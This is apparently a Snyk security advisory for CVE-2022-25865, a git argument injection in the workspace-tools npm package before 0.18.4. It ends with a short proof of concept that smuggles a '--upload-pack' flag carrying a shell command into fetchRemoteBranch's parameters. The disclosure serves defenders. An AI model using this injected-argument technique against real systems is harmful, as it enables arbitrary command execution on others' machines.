Command Injection Affecting workspace-tools package, versions <0.18.4
Snyk CVSS
Attack Complexity
High
Confidentiality
High
Integrity
High
Availability
High
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.11% (43rd
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-WORKSPACETOOLS-2421201
- published 11 May 2022
- disclosed 11 Mar 2022
- credit Alessio Della Libera of Snyk Research Team
Introduced: 11 Mar 2022
CVE-2022-25865 Open this link in a new tabHow to fix?
Upgrade workspace-tools to version 0.18.4 or higher.
Overview
workspace-tools is a JS Monorepo Workspace Tools.
Affected versions of this package are vulnerable to Command Injection via git argument injection. When calling the fetchRemoteBranch(remote: string, remoteBranch: string, cwd: string) function, both the remote and remoteBranch parameters are passed to the git fetch subcommand in a way that additional flags can be set. The additional flags can be used to perform a command injection.
PoC
const workspace_tools = require("workspace-tools");
workspace_tools.init("./", "username", "password") // or git init
let remote1 = "origin";
let remoteBranch1 = "--upload-pack=touch HELLO1;";
workspace_tools.fetchRemoteBranch(remote1, remoteBranch1, "./") // git [ 'fetch', 'origin', '--upload-pack=touch HELLO1;' ]
// let remote2 = "--upload-pack=touch HELLO2;";
// let remoteBranch2 = "foo";
// workspace_tools.fetchRemoteBranch(remote2, remoteBranch2, "./") // git [ 'fetch', '--upload-pack=touch HELLO2;', 'foo' ]